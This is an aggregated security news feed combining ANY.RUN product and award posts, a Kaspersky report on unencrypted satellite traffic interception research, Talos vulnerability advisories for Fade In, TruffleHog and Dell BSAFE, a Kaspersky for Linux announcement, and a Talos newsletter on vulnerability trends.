Big news from the ANY.RUN team; we’ve just been named the 2025 “Trailblazing Threat Intelligence” winner at the Top InfoSec Innovators Awards!
This recognition means a lot to us because it celebrates what we care about most: helping analysts, SOC teams, and researchers access live, actionable threat intelligence that makes a real difference in investigations every day.
A Milestone That Reflects Our Mission
The Top InfoSec Innovator Awards celebrate cybersecurity companies that shape the future of the industry with new ideas and bold technology. Now in its 13th year, the program is known worldwide for spotlighting organizations that truly move the field forward.
Winning the Trailblazing Threat Intelligence award reinforces what drives us, transforming how teams investigate and respond to cyber threats through a connected, behavioral approach to intelligence.
TI Lookup with 40+ parameters, used to discover relevant intel from real-world threat investigations
For our users, this award reflects the impact they experience every day:
Connected intelligence, powered by 15,000+ company data sources worldwide: ANY.RUN’s ecosystem gathers insights from thousands of live environments, helping teams detect threats that traditional feeds often miss.
24× more IOCs per incident for wider visibility: Live data from global attacks ensures comprehensive coverage of new malware and phishing campaigns, giving analysts the full picture behind each alert.
99% unique IOCs to cut noise and workload: In-depth behavioral intelligence filters out duplicates and low-value data, reducing Tier 1/Tier 2 investigation time and supporting faster, more confident decisions.
21 minutes faster MTTR per case: Real-time context for IOCs, IOAs, and IOBs provides the insight analysts need to prioritize critical alerts and accelerate incident resolution.
Experience the award-winning TI solutions trusted by 15,000+ organizations
Connecting People and Data Through Innovative Threat Intelligence
We earned this recognition because innovation at ANY.RUN is built around real analyst needs. Instead of scattering data across multiple tools, we created an ecosystem where threat intelligence is connected, interactive, and human-centered.
Our Threat Intelligence Lookup and Threat Intelligence Feeds bridge live malware behavior with verified indicators, giving teams instant context they can trust. Whether it’s uncovering hidden links between campaigns or enriching detections automatically, these solutions help analysts see more, decide faster, and collaborate better.
TI Feeds gather fresh threat data and enrich your system with it for expanded threat coverage
That’s what this award stands for: innovation that connects people and data to make threat intelligence more practical, powerful, and ready for what’s next.
Looking Ahead: Building the Future of Threat Intelligence
This recognition fuels our drive to keep innovating. In the coming months, we’re expanding our Threat Intelligence products with even deeper enrichment, new integrations for SIEM and SOAR platforms, and broader OS coverage.
But most importantly, we’ll keep growing together with our community; the analysts, researchers, and security teams who make ANY.RUN what it is today. Every sample executed, every IOC shared, every insight contributed helps make global defense stronger.
So, this win is yours as much as it is ours.
See Why the Industry Calls It Trailblazing
Experience threat intelligence that helps analysts act 21 minutes faster per case and uncover 24× more IOCs per incident.
With behavior-driven data and real-world context, ANY.RUN turns every investigation into clear, actionable insight.
Book a live demo and see how connected intelligence can sharpen your team’s response.
About ANY.RUN
ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, makes advanced investigation fast, visual, and accessible. The service processes millions of analysis sessions and is trusted by 15,000+ organizations and over 500,000 cybersecurity professionals worldwide.
Teams using ANY.RUN report tangible gains; up to 3× higher SOC efficiency, 90% faster detection of unknown threats, and a 60% reduction in false positives thanks to real-time interactivity and behavior-based analysis.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-06 10:06:302025-11-06 10:06:30ANY.RUN Wins Trailblazing Threat Intelligence at the 2025 Top InfoSec Innovators Awards
The year is 2024. A team of scientists from both the University of California San Diego and the University of Maryland, College Park, discovers an unimaginable danger looming over the world — its source hiding in space. They start sounding the alarm, but most people simply ignore them…
No, this isn’t the plot of the Netflix hit movie Don’t Look Up. This is the sudden reality in which we find ourselves following the publication of a study confirming that corporate VoIP conversations, military operation data, Mexican police records, private text messages and calls from mobile subscribers in both the U.S. and Mexico, and dozens of other types of confidential data are being broadcast unencrypted via satellites for thousands of miles. And to intercept it, all you need is equipment costing less than US$800: a simple satellite-TV receiver kit.
Today, we explore what might have caused this negligence, if it’s truly as easy to extract the data from the stream as described in a Wired article, why some data operators ignored the study and took no action, and, finally, what we can do to ensure our own data doesn’t end up on these vulnerable channels.
What happened?
Six researchers set up a standard geostationary satellite-TV antenna — the kind you can buy from any satellite provider or electronics store — on the university roof in the coastal La Jolla area of San Diego, Southern California. The researchers’ no-frills rig set them back a total of US$750: $185 for the satellite dish and receiver, $140 for the mounting hardware, $195 for the motorized actuator to rotate the antenna, and $230 for a TBS5927 USB-enabled TV tuner. It’s worth noting that in many other parts of the world, this entire kit likely would have cost them much less.
What distinguished this kit from the typical satellite-TV antenna likely installed outside your own window or on your roof was the motorized dish actuator. This mechanism allowed them to reposition the antenna to receive signals from various satellites within their line of sight. Geostationary satellites, used for television and communications, orbit above the equator and move at the same angular velocity as the Earth. This ensures they remain stationary relative to the Earth’s surface. Normally, once you point your antenna at your chosen communication satellite, you don’t need to move it again. However, the motorized drive allowed the researchers to quickly redirect the antenna from one satellite to another.
Every geostationary satellite is equipped with numerous data transponders used by a variety of telecom operators. From their vantage point, the scientists managed to capture signals from 411 transponders across 39 geostationary satellites, successfully obtaining IP traffic from 14.3% of all Ku-band transponders worldwide.
The researchers were able to use their simple US$750 rig to examine traffic from nearly 15% of all active satellite transponders worldwide. Source
The team first developed a proprietary method for precise antenna self-alignment, which significantly improved signal quality. Between August 16 and August 23, 2024, they performed an initial scan of all 39 visible satellites. They recorded signals lasting three to ten minutes from every accessible transponder. After compiling this initial data set, the scientists continued with periodic selective satellite scans and lengthy, targeted recordings from specific satellites for deeper analysis — ultimately collecting a total of more than 3.7TB of raw data.
The researchers wrote code to parse data transfer protocols and reconstruct network packets from the raw captures of satellite transmissions. Month after month, they meticulously analyzed the intercepted traffic, growing increasingly concerned with each passing day. They found that half (!) of the confidential traffic broadcast from these satellites was completely unencrypted. Considering that there are thousands of transponders in geostationary orbit, and the signal from each one can, under favorable conditions, be received across an area covering up to 40% of the Earth’s surface, this story is genuinely alarming.
Pictured at the University of San Diego roof setup, from left to right: Annie Dai, Aaron Schulman, Keegan Ryan, Nadia Heninger, and Morty Zhang. Not pictured: Dave Levin. Source
What data was broadcast with open access?
The geostationary satellites were found to be broadcasting an immense and varied amount of highly sensitive data completely unencrypted. The intercepted traffic included:
Calls, SMS messages, and internet traffic from end-users; equipment identifiers and cellular encryption keys belonging to various operators, including T-Mobile and AT&T Mexico
Internet data for users of in-flight Wi-Fi systems installed on commercial passenger aircraft
Voice traffic from several major VoIP providers, including KPU Telecommunications, Telmex, and WiBo
Government, law enforcement and military traffic: data originating from U.S. military ships; real-time geolocation and telemetry data from Mexican Armed Forces air, sea and ground assets; and information from Mexican law enforcement agencies — including data on drug trafficking operations and public assemblies
Corporate data: internal traffic from major financial organizations and banks like Grupo Santander Mexico, Banjército, and Banorte
Internal traffic from Walmart-Mexico, including details on warehouse inventory and price updates
Messages from key U.S. and Mexican infrastructure facilities like oil and gas rigs and electricity providers
While most of this data seems to have been left unencrypted due to sheer negligence or a desire to cut costs (which we’ll discuss later), the presence of cellular data in the satellite network has a slightly more intriguing origin. This issue stems from what is known as backhaul traffic — used to connect remote cell towers. Many towers located in hard-to-reach areas communicate with the main cellular network via satellites: the tower beams a signal up to the satellite, and the satellite relays it back to the tower. Crucially, the unencrypted traffic the researchers intercepted was the data being transmitted from the satellite back down to the remote cell tower. This provided them access to things like SMS messages and portions of voice traffic flowing through that link.
Data operators’ response to the researchers’ messages
It’s time for our second reference to the modern classic by Adam McKay. The movie Don’t Look Up is a satirical commentary on our reality — where even an impending comet collision and total annihilation cannot convince people to take the situation seriously. Unfortunately, the reaction of critical infrastructure operators to the scientists’ warnings proved to be strikingly similar to the movie plot.
Starting in December 2024, the researchers began notifying the companies whose unencrypted traffic they’d successfully intercepted and identified. To gauge the effectiveness of these warnings, the team conducted a follow-up scan of the satellites in February 2025 and compared the results. They found that far from all operators took any action to fix the issues. Therefore, after waiting nearly a year, the scientists decided to publicly release their study in October 2025 — detailing both the interception procedure and the operators’ disappointing response.
The researchers stated that they were only publishing information about the affected systems after the problem had been fixed or after the standard 90-day waiting period for disclosure had expired. For some systems, an information disclosure embargo was still in effect at the time of the study’s publication, so the scientists plan to update their materials as clearance allows.
Among those who failed to address the notifications were: the operators of unnamed critical infrastructure facilities, the U.S. Armed Forces, Mexican military and law enforcement agencies, as well as Banorte, Telmex, and Banjército.
When questioned by Wired about the incident, in-flight Wi-Fi providers responded vaguely. A spokesperson for Panasonic Avionics Corporation said the company welcomed the findings by the researchers, but claimed they’d found that several statements attributed to them were either inaccurate or misrepresented the company’s position. The spokesperson didn’t specify what exactly it was that the company considered inaccurate. “Our satellite communications systems are designed so that every user-data session follows established security protocols,” the spokesperson said. Meanwhile, a spokesperson for SES (the parent company of Intelsat) completely shifted responsibility onto the users, saying, “Generally, our users choose the encryption that they apply to their communications to suit their specific application or need,” effectively equating using in-flight Wi-Fi with connecting to a public hotspot in a café or hotel.
The SES spokesperson’s response to Wired, along with a comment by Matthew Green, an associate professor of computer science at Johns Hopkins University in Baltimore. Source
Fortunately, there were also many appropriate responses, primarily within the telecommunications sector. T-Mobile encrypted its traffic within just a few weeks of being notified by the researchers. AT&T Mexico also reacted immediately, fixing the vulnerability and stating it was caused by a misconfiguration of some towers by a satellite provider in Mexico. Walmart-Mexico, Grupo Santander Mexico, and KPU Telecommunications all approached the security issue diligently and conscientiously.
Why was the data unencrypted?
According to the researchers, data operators have a variety of reasons — ranging from technical to financial — for avoiding encryption.
Utilizing encryption can lead to a 20–30% loss in transponder bandwidth capacity.
Encryption requires increased power consumption, which is critical for remote terminals, such as those running on solar batteries.
For certain types of traffic, such as VoIP for emergency services, the lack of encryption is a deliberate measure taken to increase fault tolerance and reliability in critical situations.
Network providers claimed that enabling encryption made it impossible to troubleshoot certain existing network problems within their current infrastructure. The providers did not elaborate on the specifics of that claim.
Enabling link-layer encryption may require additional licensing fees for using cryptography in terminals and hubs.
Why did some vendors and agencies fail to react?
It’s highly likely they simply did not know how to respond. It’s difficult to believe that such a massive vulnerability could remain unnoticed for decades, so it’s possible the problem was intentionally left unaddressed. The researchers note that no single, unified entity is responsible for overseeing data encryption on geostationary satellites. Each time they discovered confidential information in their intercepted data, they had to expend considerable effort to identify the responsible party, establish contact, and disclose the vulnerability.
Some experts are comparing the media impact of this research to the declassified Snowden archives, given that the interception techniques used could be deployed for worldwide traffic monitoring. We can also liken this case to the infamous Jeep hack, which completely upended cybersecurity standards in the automotive industry.
We cannot exclude the possibility that this entire issue stems from simple negligence and wishful thinking — a reliance on the assumption that no one would ever “look up”. Data operators may have treated satellite communication as a trusted, internal network link where encryption was simply not a mandatory standard.
What can we as users do?
For regular users, the recommendations are similar to those we give for using any unsecured public Wi-Fi access point. Unfortunately, while we can encrypt the internet traffic originating from our devices ourselves, the same cannot be done for cellular voice data and SMS messages.
For any confidential online operations, enable a reliable VPN that includes a kill switch. This ensures that if the VPN connection drops, all your traffic is immediately blocked rather than being routed unencrypted. Use your VPN when making VoIP calls, and especially when using in-flight Wi-Fi or other public access points. If you lean toward the paranoid side, leave your VPN on at all times. An effective and fast solution for your needs could be Kaspersky VPN Secure Connection.
Utilize 5G networks whenever possible, as they feature higher encryption standards. However, even these can be insecure, so avoid discussing sensitive information via text or standard cellular voice calls.
Use messaging apps that provide end-to-end encryption for traffic on user devices, such as Signal, WhatsApp, or Threema.
If you’re using a cellular service in remote locations, minimize SMS chats and voice calls, or use services from operators that integrate encryption at the subscriber equipment level.
What else you need to know about telecommunication security:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-05 20:06:402025-11-05 20:06:40Half of the world’s satellite traffic is unencrypted | Kaspersky official blog
Think you could never fall for an online scam? Think again. Here’s how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead
ANY.RUN’s malware analysis and threat intelligence products are used by 15K SOCs and 500K analysts. Thanks to flexible API/SDK and read-made connectors, they seamlessly integrate with security teams’ existing software to expand threat coverage, reduce MTTR, and streamline performance.
Here’s how ANY.RUN’s solutions can transform your security.
Interactive Sandbox provides SOCs with fast threat detection capabilities
ANY.RUN’s Interactive Sandbox provides a real-time, cloud-based environment for detonating and analyzing suspicious files, URLs, and scripts across Windows, Linux, and Android systems. It lets analysts perform user actions like launching executables or opening links needed to trigger kill chains and force hidden payloads to reveal themselves, enabling faster detection and response.
The sandbox integrates with other solutions like SOAR platforms in an automated mode, which means it can fully detonate complex phishing and malware attacks on its own, including by solving CAPTCHAs and scanning QR codes.
The sandbox delivers immediate, actionable insights into the most evasive threats without risking production systems.
Real-Time Threat Visibility: Observe attack chains as they unfold, with 90% of threats detected within 60 seconds, accelerating mean time to detect (MTTD).
Higher Detection Rates: Uncover low-detection attacks (e.g., multi-stage malware, CAPTCHA-protected phishing) with up to 58% more threats identified, reducing missed incidents.
Automated Efficiency: Cut manual analysis time with automated interactivity, reducing Tier 1 workload by 20% and enabling junior analysts to handle complex cases independently.
Connectors and integrations for Interactive Sandbox
TI Feeds offer 99% unique IOCs to identify the latest threats early
Threat Intelligence Feeds deliver real-time, high-confidence malicious indicators (IPs, domains, URLs) supplied in STIX/TAXII. The indicators are sourced from analyses of the latest malware and phishing attacks performed by 15,000 organizations and 500,000 analysts in ANY.RUN’s Interactive Sandbox.
Thanks to being powered by one of the largest malware analysis communities, these feeds provide 99% unique IOCs, not found in other sources, that are updated in real time.
As a result, they give SOCs up-to-date visibility into threats almost as soon as they emerge. With TI Feeds, security teams can:
Catch new attacks early: Live intel is streamed soon after the sandbox detection.
Respond faster: IOCs come with sandbox reports with full context.
Reduce workload: Filtering ensures only high-risk indicators are added.
If your solution is not on the list, you can easily set up a custom integration using ANY.RUN’s API or Python-based SDK (see docs on GitHub or PyPi).
Threat Intelligence Lookup: Contextualize Alerts
TI Lookup lets SOC teams get instant context for 40 types of indicators
Threat Intelligence Lookup is a powerful solution designed to streamline and accelerate malware investigations, from proactive monitoring to incident response.
SOC teams can use it to quickly get actionable context for over 40 different types of Indicators of Compromise (IOCs), Attack (IOAs), and Behavior (IOBs), from an IP address and a domain to a mutex and a process name.
TI Lookup provides fresh indicators for the most active malware families
Each indicator in TI Lookup’s database is linked to a sandbox session, where it was observed, providing analysts with a complete view of the attack, including its TTPs.
Triage alerts faster: Two-second access to millions of past analyses confirms if an IOC belongs to a threat, cutting triage time.
Shorten response time: Indicator enrichment with behavioral context and TTPs guide precise containment strategies.
Reduce unnecessary escalations: Provides Tier 1 analysts with the info to make decisions independently, reducing escalations to Tier 2.
If your solution is not on the list, you can easily set up a custom integration using ANY.RUN’s API or Python-based SDK (see docs on GitHub or PyPi).
Integrate ANY.RUN’s Solutions in Your SOC
Whether you want to uncover hidden threats in seconds, catch emerging attacks, or enrich alerts with actionable context, ANY.RUN equips your SOC with the visibility, speed, and efficiency needed to stay ahead.
With flexible API/SDK and ready-made connectors for leading platforms, implementation is smooth, and the impact is immediate: faster MTTR, higher detection rates, and a stronger defense posture.
Feel free to reach out to us about integrating ANY.RUN’s products in your SOC at support@any.run.
About ANY.RUN
Trusted by over 500,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and other critical industries, ANY.RUN helps security teams investigate threats faster and with greater accuracy.
Our Interactive Sandbox accelerates incident response by allowing you to analyze suspicious files in real time, watch behavior as it unfolds, and make confident, well-informed decisions.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-05 08:06:512025-11-05 08:06:51Unified Security for Fast Response: All ANY.RUN Integrations for SIEM, SOAR, EDR, and More
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Dell BSAFE, two in Fade In screenwriting software, and one in Trufflehog.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Fade In out-of-bounds write vulnerabilities
Discovered by Piotr Bania of Cisco Talos.
Fade In is a cross-platform text handling software for screenwriters.
TALOS-2025-2250 (CVE-2025-53855) is an out-of-bounds write vulnerability in the XML parser functionality of GCC Productions Inc. Fade In 4.2.0. A specially crafted .fadein file can lead to an out-of-bounds write.
TALOS-2025-2252 (CVE-2025-53814) is a use-after-free vulnerability in the XML parser functionality of GCC Productions Inc. Fade In 4.2.0. A specially crafted .xml file can lead to heap-based memory corruption.
TruffleHog arbitrary code execution vulnerability
Discovered by Adam Reiser of Cisco ASIG.
TruffleHog is a detection system for code repositories and ticket systems that finds exposed sensitive information, such as API keys and passwords. This vulnerability is described in an accompanying article on the Truffle Security website. The vuln is an arbitrary code execution vulnerability in the Git functionality of TruffleHog 3.90.2,TALOS-2025-2243 (CVE-2025-41390). A specially crafted repository can lead to a arbitrary code execution. An attacker can provide a malicious repository to trigger this vulnerability.
Dell BSAFE integer overflow, underflow, and stack overflow vulnerabilities
Discovered by Jason Crowder.
Dell BSAFE Crypto-C is FIPS-140 validated cryptography development kit for C/C++ environments. In cooperation with Jason Crowder, Talos published three vulnerabilities in the Dell BSAFE Crypto-C module. This product is at end of service; the vulnerable versions were added to an existing CVE.
TALOS-2025-2140 (CVE-2019-3728) is an integer overflow vulnerability, and TALOS-2025-2141 (CVE-2019-3728) is an integer underflow vulnerability. In both cases, a specially crafted ASN.1 record can lead to an out-of-bounds read. An attacker can provide a malformed ASN.1 record to trigger this vulnerability.
TALOS-2025-2142 (CVE-2019-3728) is a stack overflow vulnerability. A specially crafted ASN.1 record can lead to denial of service.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-04 16:06:322025-11-04 16:06:32TruffleHog, Fade In and BSAFE Crypto-C vulnerabilities
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-03 22:06:362025-11-03 22:06:36Ground zero: 5 things to do after discovering a cyberattack
If you thought Linux was immune to cyberthreats, it’s time to rethink that view. The number of malicious programs targeting this OS has increased 20-fold over the past five years! These threats include miners, ransomware, and even malware embedded into the source code of popular applications. For instance, last year’s attack involving a backdoor in the XZ archiving utility, which is built into many popular Linux distributions, could have become the most widespread attack on the Linux ecosystem in its entire history.
Beyond viruses, Linux users face other threats that are common across all platforms: phishing and malicious websites, as well as theft of passwords and banking and personal data.
As interest in Linux-powered devices grows year after year, we want to ensure our users have 100% protection across every operating system. To achieve this, we’ve adapted our business security solution, which has been used worldwide for years, to meet the needs of home users.
Monitoring the system, devices, and individual files to detect and eliminate malware
Scanning removable media connected to the PC, including USB drives and hard drives, for threats
Detecting malware through behavior analysis on the device, providing proactive defense
Protecting against malware on the internet
Alerting users when they attempt to follow a phishing link
AI-powered antivirus scans and blocks infected files, folders, and applications upon detecting viruses, ransomware Trojans, password stealers, and other malware, preventing infection of your PC, other devices, and your entire network.
Anti-phishing warns you about phishing links in emails and on websites to protect your login credentials and banking data from theft.
Online payment protection verifies the security of bank websites and online stores before you execute any financial transactions.
Anti-cryptojacking prevents unauthorized crypto mining on your device to ensure cybercriminals can’t drain its performance.
Scanning of removable media, such as USB drives and external hard drives, upon connection to your computer uses the tried and true method of defending against the spread of viruses.
What are the technical requirements for Kaspersky for Linux?
Kaspersky for Linux supports major 64-bit Linux distributions, including Ubuntu, ALT Linux, Uncom, and RED OS.
To install the software, your PC must meet the following minimum specifications: at least a Core 2 Duo 1.86GHz CPU, 2GB of RAM, at least 1GB of swap space, and 4GB of free disk space. You can find the full system requirements here.
How to install Kaspersky for Linux?
First, sign in to your My Kaspersky account. If you don’t have one, it’ll be created automatically when you purchase a subscription or install the free trial version.
Next, download the installation files compatible with your flavor of Linux: Kaspersky for Linux is distributed in DEB and RPM package formats.
Which Kaspersky subscription should Linux users choose?
Currently, the set of features available to users of Kaspersky for Linux doesn’t depend on your subscription — be it Kaspersky Standard, Kaspersky Plus, or Kaspersky Premium. This allows you to choose the most cost-effective option: for example, if you only need to protect a single PC running Linux, Kaspersky Standard is sufficient.
However, if you have a multi-device home ecosystem with computers, laptops, smartphones, and tablets running various operating systems, consider Kaspersky Premium. With this plan, you can protect up to 10 devices for all your family members. In addition to the top-tier security for Windows, Linux, macOS, Android, and iOS, you get a password manager, a fast and unlimited VPN, and a Kaspersky Safe Kids app for child protection and parental control (the last three are for Windows, macOS, Android, and iOS only).
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-11-03 15:06:462025-11-03 15:06:46Kaspersky for Linux expands security options for home users | Kaspersky official blog
October brought another strong round of updates to ANY.RUN, from a new ThreatQ integration that connects our real-time Threat Intelligence Feeds directly into one of the industry’s leading TIPs, to hundreds of new signatures and rules that sharpen network and behavioral detection.
With 125 new behavior signatures, 17 YARA rules, and 3,264 Suricata rules, analysts can now spot emerging threats faster and with greater precision. Together with the ThreatQ connector, these improvements make it easier for SOCs and MSSPs to enrich alerts, automate response, and gain deeper visibility into live attack activity.
October brought another major milestone to ANY.RUN’s growing ecosystem; a new integration that links ANY.RUN’s Threat Intelligence Feeds directly with ThreatQ, one of the industry’s leading Threat Intelligence Platforms (TIPs).
This integration helps SOC teams and MSSPs gain real-time visibility into active global threats, cut investigation time, and strengthen detection accuracy across phishing, malware, and network attack surfaces.
Now, analysts using ThreatQ can automatically ingest fresh, high-confidence IOCs gathered from live sandbox investigations of malware samples detonated by 15,000+ organizations and 500,000+ analysts worldwide.
How this update helps security teams:
TI Feeds help SOCs boost key security metrics
Early detection: Indicators are streamed into ThreatQ the moment they appear in ANY.RUN sandbox sessions, helping teams spot threats before they hit endpoints or networks.
Expanded coverage: Up to 99% unique IOCs from recent phishing and malware attacks provide visibility beyond traditional feeds.
Faster, smarter response: Each IOC includes a link to its sandbox analysis, giving full behavioral context for rapid validation and containment.
Lower analyst workload: Feeds are filtered to include only verified malicious indicators, cutting false positives and Tier-1 triage time.
Simple Setup, Instant Impact
The connector works through the STIX/TAXII protocol, ensuring full compatibility with existing ThreatQ environments. Security teams can configure feeds to update hourly, daily, or on a custom schedule; no custom development or infrastructure changes required.
In October, our team continued to strengthen detection capabilities so SOCs can stay ahead of new and evolving threats:
125 new behavior signatures were added to improve coverage across ransomware, loaders, stealers, and RATs, helping analysts detect persistence and payload activity earlier in the attack chain.
17 new YARA rules went live in production, expanding visibility into credential-dumping tools, network scanners, and new loader families.
3,264 new Suricata rules were deployed, enhancing detection for phishing, APT infrastructure, and evasive network behaviors.
These updates enable analysts to gain faster, more confident verdicts in the sandbox and enrich SIEM, SOAR, and IDS workflows with fresh, actionable IOCs.
New Behavior Signatures
This month’s updates focus on helping analysts catch stealthy activity earlier in the attack chain. The new behavior signatures detect payload downloads, privilege escalation attempts, and persistence mechanisms used by modern ransomware, stealers, and loaders.
We also expanded coverage of mutex detections and legitimate administrative tools often abused by attackers. Together, these improvements provide clearer visibility into real-world execution flow and strengthen automated classification in the sandbox.
In October, we added 17 new YARA rules focused on detecting emerging malware families, credential-dumping utilities, and reconnaissance tools increasingly used in modern attack chains.
These additions strengthen both automated detection and manual hunting, helping analysts identify threats that blend malicious code with legitimate administrative software.
Several new rules were built directly from live samples analyzed in the sandbox, capturing real payloads, shellcode fragments, and memory artifacts tied to loaders, stealers, and botnets. This ensures faster and more reliable classification when scanning new samples or correlating incidents across environments.
Highlighted YARA rules include:
Maverick: Detection for a recently active loader family observed in targeted phishing campaigns.
ChaosBot: Identifies obfuscated botnet samples distributing info-stealers via Discord channels.
Hexa: Flags packed binaries linked to a new modular backdoor variant.
Pmdump: Detects credential-dumping activity using memory process extraction tools.
Task Manager DeLuxe: Identifies legitimate system tools often repurposed for lateral movement.
Network Scanner: Flags reconnaissance utilities used to map internal networks.
Yapm: Detects process-management tools frequently abused for privilege escalation.
TaskExplorer: Expands visibility into post-exploitation tool use.
Ophcrack: Detection of password-recovery tools commonly found in attacker toolkits.
New Suricata Rules
This month, the detection team delivered 3,264 new Suricata rules to improve coverage of phishing activity, APT operations, and evasive web-based malware behavior.
These updates expand network visibility for SOCs and MSSPs, helping analysts detect malicious traffic even when it hides behind trusted services or multi-stage redirects.
Highlighted additions include:
Tycoon 2FA Domain Chain (sid:85004273, 85004828, 85005024): New heuristic rules based on set of web-resources loaded in specific order by Tycoon client-side code
ANY.RUN supports more than 15,000 organizations worldwide across industries such as banking, manufacturing, telecom, healthcare, and technology, helping them build faster, smarter, and more resilient cybersecurity operations.
Our cloud-based interactive sandbox enables teams to safely analyze threats targeting Windows, Linux, and Android systems in real time. Analysts can observe every system and network action, interact with running samples, and extract IOCs in under 40 seconds; all without complex infrastructure setup.
Combined with Threat Intelligence Lookup and Threat Intelligence Feeds, ANY.RUN helps SOCs accelerate investigations, reduce noise, and improve detection accuracy. Teams can easily integrate these capabilities into SIEM and SOAR systems to automate enrichment and streamline response.
Welcome to this week’s edition of the Threat Source newsletter.
This one is pretty much an updated, Halloween-themed version of my newsletter from July, including data up through Q3.
October 14th has passed, so free support for Windows 10 has come to an end, leaving you with no more fixes unless you’re willing to pony up. While users in many countries must now pay to get Windows 10 security updates (the “trick”), private users in the European Economic Area get free security updates (the “treat”) until Oct. 14, 2026. This special reward, won after consumer rights groups pushed Microsoft to do better under EU law, means no $30 fee, no reward points, and no cloud backup needed… just a Microsoft account.
There’s another trick: The treat is for consumers, not companies, and there are some technical prerequisites (described here).
While Cybersecurity Awareness Month is coming to end, you still have a chance to reach out to friends and family and encourage them to update their software (one of the Core4 Messages this year). Get them to enable the Extended Security Updates (ESU), update to Windows 11, or migrate to any other OS that will receive future patches.
Patching is critical. In Q3, we did not run short on vulnerabilities.
Figure 1. Total number of CVEs per year.
With roughly 35,000 CVEs by the end of September, we are still tracking a pace of about 130 CVEs per day. If the almost-linear trend continues, we will land at round about 47,000 for 2025. And for legal purposes, I am not challenging anyone to break the barrier of 50,000!
This is not just about theoretical vulnerabilities. Known Exploited Vulnerabilities (KEVs) are also on the rise. In comparison, the number of KEVs stayed nearly the same between 2023 and 2024, with 187 and 186, respectively.
Figure 2. Total number of KEVs per year.
With 183 at the end of Q3, I think it is safe to say we are going to surpass the number this year. (Spoiler: At the time of writing, there were already 210.) KEVs that affect network-related gear are up by 3% to 28%, which is not a massive increase but for sure a relevant portion. Overall, vendor diversity also continues to expand, increasing from 61 in July to 79 so far this year.
Figure 3. CVE from year added to KEV in 2025.
While the oldest CVE added to the catalog was from 2017 last time, the third quarter introduced a few new negative records from 2007, 2013, 2014, and 2016.
While this isn’t a part of our Q3 data, CVE-2025-59287 caught my attention late Friday afternoon. I didn’t expect WSUS service to be publicly exposed to the internet, but it found its way into the KEV, too.
In a pumpkin shell: Keep stalking those bugs and patching your spells, because vulnerabilities won’t patch themselves. Happy Halloween!
The one big thing
We’re introducing the Tool Talk series, where Talos shares open-source tools alongside practical insights, tips, and enhancements to help cybersecurity professionals and researchers work smarter and more effectively.
Our first post introduces dynamic binary instrumentation (DBI) and provides a step-by-step guide to building your own DBI tool using the open-source DynamoRIO framework on Windows 11. DBI lets you analyze and modify running programs — crucial for malware analysis, security audits, reverse engineering, and performance profiling — even when you don’t have the original source code. The post covers DynamoRIO’s strengths, compares it to other frameworks, and offers practical examples, including sample code from our GitHub repository.
Why do I care?
If you’re interested in malware analysis, debugging, or getting a deeper look inside how binaries behave at runtime, this blog shows you how to do all that without needing source code access. DBI tools like DynamoRIO are essential for modern security research, especially for bypassing common malware defenses and anti-analysis tricks.
So now what?
Ready to get hands-on? Follow the blog’s step-by-step instructions to build your own DBI client, test it out, and explore the example code provided. Whether you’re looking to automate malware analysis, profile software, or just tinker with low-level instrumentation, you’ll find everything you need to kickstart your own DBI projects.
Top security headlines of the week
Microsoft issues emergency patch for critical Windows Server bug This CVE is a remote code execution (RCE) flaw in WSUS, which is part of Windows Server and allows administrators to schedule, manage, and deploy patches, hotfixes, service packs, and other updates. (DarkReading)
Shutdown sparks 85% increase in U.S. government cyberattacks Cyberattacks against federal employees have nearly doubled since the US government shut down on Oct. 1. Experts emphasize that the most serious cyber consequences of the shutdown won’t come in the form of immediate breaches.(DarkReading)
Over 250 Magento stores hit overnight as hackers exploit new Adobe Commerce flaw E-commerce security company Sansec has warned that threat actors have begun to exploit a recently disclosed security vulnerability in Adobe Commerce and Magento Open Source platforms. (The Hacker News)
Hacking Team successor linked to malware campaign, new “Dante” commercial spyware Kaspersky found that victims were infected through personalized phishing links exploiting a zero-day Chrome vulnerability, with the campaign targeting a broad range of Russian organizations for espionage. (CyberScoop)
Cybersecurity on a budget: Strategies for an economic downturn Budget cuts and layoffs make securing an organization more difficult. This blog offers practical strategies, creative defenses, and talent management advice to help your business stay secure when every dollar counts.
Principles of the CIA triad, threat intel, and threat hunting This recorded CCNA prep session with our own Pierre Cadieux teaches you how to effectively discuss risks and threats using the CIA triad, build a solid foundation in threat intelligence, and gain insight into how threat hunting operates in today’s security landscape.
Each cyberattack leaves behavioral evidence. A malware sandbox provides the secure environment analysts need to study that activity and uncover hidden tactics.
Teams using sandbox analysis report measurable gains:
90% faster detection of unknown malware
Up to 3× improvement in investigation speed
60% fewer false positives in automated alerts
Behavior-based visibility gives SOCs the upper hand against stealthy attacks. Let’s see how sandbox security works, and why it has become essential for modern threat detection.
What’s a Malware Sandbox?
A malware sandbox is a controlled, isolated environment designed to safely run and observe suspicious files, links, or applications. It allows analysts to see exactly how a threat behaves without risking real systems or networks.
Instead of relying on signatures or predefined rules, a sandbox focuses on dynamic malware analysis, monitoring how code acts in motion. This approach helps detect new, unknown, or obfuscated malware that traditional antivirus tools often miss.
ANY.RUN’s Interactive Sandbox provides a safe environment for malware analysis
Inside the sandbox environment, analysts can observe file system changes, registry modifications, network requests, and command execution in real time. Every action is recorded, creating a detailed behavioral profile that reveals the malware’s purpose, persistence methods, and communication patterns.
